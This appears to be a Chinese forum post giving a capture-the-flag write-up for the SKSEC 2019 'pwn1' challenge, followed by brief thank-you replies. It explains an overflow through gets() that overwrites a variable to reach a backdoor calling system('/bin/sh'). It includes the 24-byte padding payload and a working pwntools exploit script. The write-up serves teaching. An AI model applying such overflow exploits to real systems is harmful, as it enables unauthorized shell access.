SKSEC 2019 pwn1

虐猫人薛定谔i · 发表于 2019-11-24 13:34

pwn1

1、将程序拖入IDA，找到主函数，按F5查看伪代码
在这里插入图片描述
2、程序的执行流程是通过gets()函数输入变量v4，如果变量v5等于440039336819(这是一个字符串，可以选中后，按r键，查看反向的字符串)，则执行backdoor()函数
3、进入backdoor()函数，可以发现函数返回了system("/bin/sh")
在这里插入图片描述
4、我们想到可以通过覆盖变量的方式来达到控制程序执行流程的目的，首先计算出变量v4和变量v5的地址差，即0x20-0x08=0x18(==注意是十六进制的！！！==),0x18转换成十进制也就是24。

5、payload就是计算出的两个变量的地址之差乘以任意字符，再加上字符串skctf

payload = 'a'*24+'skctf'

6、漏洞利用脚本如下：

from pwn import *
p=process('./pwn1')
payload='a'*24+'skctf'
p.sendline(payload)
p.interactive()

aoyoudahai · 发表于 2019-11-25 08:42

非常感谢楼主的分享

wisoft · 发表于 2019-11-25 09:33

能分享程序不？

forthebest · 发表于 2019-11-26 16:18

学长出的入门好题。

richens · 发表于 2019-11-27 11:24

学习学习！

18813295220 · 发表于 2019-11-28 09:41

学习，感谢楼主分享

工程欧巴 · 发表于 2019-11-29 10:24

厉害，支持一下

Dabingpeng · 发表于 2019-12-4 09:05

感谢分享

psych1 · 发表于 2019-12-16 20:38

楼主还有其他的题目吗？想多学一点

feiyu988 · 发表于 2019-12-16 20:51

感谢分享！

帐号		自动登录	找回密码
密码			注册[Register]

[原创] SKSEC 2019 pwn1

pwn1

免费评分